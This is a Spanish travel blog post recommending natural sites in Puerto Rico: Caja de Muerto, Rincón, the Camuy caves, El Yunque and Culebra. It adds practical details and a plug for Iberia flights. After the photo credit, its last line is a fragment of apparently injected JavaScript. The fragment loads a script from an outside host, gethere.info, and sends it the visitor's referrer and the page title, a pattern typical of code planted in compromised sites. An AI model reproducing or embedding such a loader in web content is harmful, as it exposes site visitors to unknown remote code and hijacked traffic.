Puerto Rico de cascadas y atardeceres

30/08/2012

El amor por la naturaleza es algo que los puertorriqueños llevan dentro. Y no es para menos. En otros posts hemos dado pistas de itinerarios por el país caribeño, desde ciudades como San Juan o Ponce hasta entornos vírgenes como Isla de Vieques y Cabo Rojo. Aquí van más sugerencias para los que aún no hayan visitado el país. Como siempre, cualquier lector puede completar la lista. Olvídese del asfalto. Debajo de él, está la tierra que nos conecta con nosotros mismos.

  • Isla Caja de Muerto. Su nombre está rodeado de leyenda: que si un escritor francés llegó y le vio un parecido con un ataúd, que si en ella aparecían los cadáveres de piratas… Sea como sea, estamos en una isla virgen y deshabitada dentro de una reserva natural. No olvide las gafas y los escarpines para bucear por sus fondos llenos de arrecifes de coral. Los peces nos saludan.
  • Rincón. El sol cae y el mundo calla. Este lugar es conocido como el pueblo de los bellos atardeceres. Cristóbal Colón, quien descubrió Rincón, seguro que disfrutó de esos ocasos de ensueño. Hágalo usted también con la vista puesta en sus colinas verdes y sus aguas cristalinas, donde se pueden avistar ballenas. Un buen plan es darse un paseo en caballo por las playas y faldas occidentales de Puerto Rico y tomar fotos espectaculares de la selva tropical (organizan la ruta Julie y Donna, de Pintos R Us). Y luego, al final del día, ver el atardecer desde un barco (hay numerosas empresas, como Katarina Sail Charters) con una piña colada.
  • Parque de las Cavernas del Río Camuy. Caminar por rampas y puentes, quedarse boquiabierto con la altura del Sumidero Tres Pueblos, descubrir los petroglifos grabados por los antiguos taínos en la Cueva Catedral, sentir el fresco de las estalactitas de la Cueva Clara… Todo esto es lo que se puede hacer en este entorno natural con ríos subterráneos, montes verdes y rocas de vértigo. Los que se queden con ganas de más aventura pueden practicar rapel.
  • El Yunque. Naturaleza en explosión. Este bosque pluvial ubicado en la Sierra de Luquillo es la casa de 240 especies de árboles. El pico más alto, El Toro, tiene 1076 metros y hasta él se puede subir por un sendero. Si no le apetece tanto esfuerzo, céntrese en las cataratas de La Coca y La Mina, el agua pura, los riachuelos y los lagos limpios. Las nubes tapan las cumbres.
  • Isla Culebra. Toda una joya natural. En realidad es un archipiélago compuesto por 23 islotes y cayos. Todos forman el municipio de Culebra y su isla más grande es conocida como La última virgen. Relájese en Playa Melones y Playa Flamenco, dos lugares paradisíacos con aguas cristalinas y vegetación como del Edén. Fuera del agua, aunque el entorno es virgen, este lugar tiene algunos servicios. Termine la jornada tomando marisco o arroz con gandules y coco en alguno de sus restaurantes. Y luego, un baño de despedida.

Datos útiles:

  • Puerto Rico es un archipiélago en el Mar Caribe.
  • Su clima es tropical y las temperaturas varían entre los 19 y los 30 grados.
  • La moneda es el dólar estadounidense.
  • Iberia ofrece vuelos a San Juan de Puerto Rico directos desde Madrid los martes, sábados y domingos. Los mejores precios, siempre en Iberia.com.

Foto | Mercedea

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;